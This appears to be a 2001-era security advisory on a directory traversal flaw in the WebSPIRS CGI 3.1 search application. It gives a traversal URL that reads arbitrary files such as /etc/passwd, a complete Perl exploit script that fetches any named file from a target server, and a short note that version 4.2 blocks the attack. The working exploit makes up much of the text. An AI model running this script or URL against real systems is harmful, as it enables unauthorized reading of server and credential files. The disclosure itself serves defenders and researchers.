COMMAND
WebSPIRS
SYSTEMS AFFECTED
WebSPIRS CGI 3.1 (at least)
PROBLEM
Following is based on a UkR security team advisory #1. WebSPIRS
is SilverPlatter's Information Retrieval System for the World Wide
Web (WWW). It is a common gateway interface (CGI) application
which allows any forms-capable browser, such as Netscape, to
search SilverPlatter (SP) Electronic Reference Library (ERL)
databases available over the Internet.
Problem lyes in incorrect validation of user submitted-by-browser
information, that can show any file of the system where script
installed. Exploit:
http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file
Exploit code:
#!/usr/bin/perl
# Remote Script to exploit bug in webspirs.cgi
# Affected systems: any where webspirs.cgi are installed
#
# Using by default "/"
# Spain 10-3-2001 (Crono) (crono@thepentagon.com)
use LWP::UserAgent;
use Socket;
use Getopt::Std;
getopts("h:v:c:", \%args);
if (!defined $args{h}, !defined $args{v}) {
print qq~
-=- WebSpirs Remote Script -=-
by Crono
Usage: perl unicode.pl -h <host> -v <file>
~;exit;
}
$host=$args{h};
$v=$args{v};
if (defined $args{h}, $args{v}){
&conectar; }
################
sub conectar {
################
print " - WebSpirs Remote Script Facility - -=- By Crono
-=-\n";
print "\nAttemtping to get: $v\n";
my $server = inet_ntoa(inet_aton($host));
my $url = "/cgi-bin/webspirs.cgi?sp.nextform=".
"../../../../..".
"$v";
my $ua = new LWP::UserAgent;
my $req = new HTTP::Request GET =>
"http://".$server.$url;
my $res = $ua->request($req);
my $web = $res->server;
my $code = $res->code;
my $content = $res->content;
print "$web\t$code\n";
print "$content\n";
}
SOLUTION
Wen you try this with WebSpirs 4.2 it says, Security Violation
Detected, Contact your Systems Administrator.. In WebSpirs 4.2
the way we have it is, URL/dbname?sp.nextform=blah/blah/blah. Now
if you switch the dbname with webspirs.cgi it comes back with no
data.. Using it as the dbname?sp.nextform=../../../../etc/passwd
gives a security violation message.